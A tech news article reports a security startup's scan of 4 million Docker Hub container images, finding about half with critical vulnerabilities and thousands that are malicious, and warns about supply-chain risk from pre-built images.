51% of 4 million Docker images have critical vulnerabilities


Prevasio, a cybersecurity startup, has announced that it has completed the scanning of 4 million container images at Docker Hub. Nearly 51% of the images have critical vulnerabilities, and nearly 6,500 of them can be considered malicious.

A dynamic sandbox system was used by Prevasio to download and build images into the Docker containers
A dynamic sandbox system was used by Prevasio to download and build images into the Docker containers
Key Facts
  1. 1

    According to an analysis by Prevasio, half of all the images available on Docker Hub have critical vulnerabilities due to outdated software. The analysis also revealed that thousands of images are in reality dangerous software, with many of them potentially being attack tools.

  2. 2

    As per Prevasio, the malicious containers representing nearly 0.16% of the total have been downloaded more than 300 million times. These were classified as malicious due to the presence of malware, hacking tools, cryptocurrency miners, and trojanized applications.

  3. 3

    The cybersecurity startup also uncovered images with dynamic payloads. It means that the original image does not look malicious, but it has been scripted to run a miner source code when downloaded, compiled then executed.

  4. 4

    A dynamic sandbox system was used by the same company to download and build images into Docker containers. They then ran the containers to detect vulnerabilities and dangerous behavior.


Prevasio’s report concluded that Linux OS, and Linux containers, in particular, were not immune to security risks. Nearly half of all container images hosted by Docker Hub contained one or more critical vulnerabilities and were potentially exploitable. Only one-fifth of all the images tested by the startup had no disclosed vulnerabilities.

The software supply chain is in greater need of security efforts. More attackers have begun identifying weaknesses and slipping malicious software into employees’ computers, bypassing perimeter security.

Docker adoption has become normal for most enterprise-class complex applications, with several large enterprises implementing Docker containers in some form. Due to containerization available everywhere, the attack surface has increased exponentially. As such, the analysis report of Prevasio should be of great concern to any enterprise customer.

Prevasio warned that if a company’s developer took a shortcut by fetching a pre-built image instead of building one anew, there is a huge risk that the pre-built image may have been trojanized. When such images end up in production, they provide easy access to attackers to containerized applications via a backdoor.

Every month there is some bad guy upping their game and utilizing more containers as part of their attack. We expect it to be more prevalent because it is very easy to use a Docker container to trick a target into building the attack tools inside their own network
Rony Moshkovich
CEO and Co-founder, Prevasio

Get similar stories in your inbox weekly, for free

Is this news interesting? Share it with your followers

Latest stories

DevOps and Downed Systems: How to Prepare

Downed systems can cost thousands of dollars in immediate losses and more in reputation damage …

Cloud: AWS Improves the Trigger Functions for Amazon SQS

The improved AWS feature allows users to trigger Lambda functions from an SQS queue.

Google Takes Security up a Notch for CI/CD With ClusterFuzzLite

Google makes fuzzing easier and faster with ClusterFuzzLite

HashiCorp Announces Vault 1.9

Vault 1.9 released into general availability with new features

Azure Container Apps: This Is What You Need to Know

HTTP-based autoscaling and scale to zero capability on a serverless platform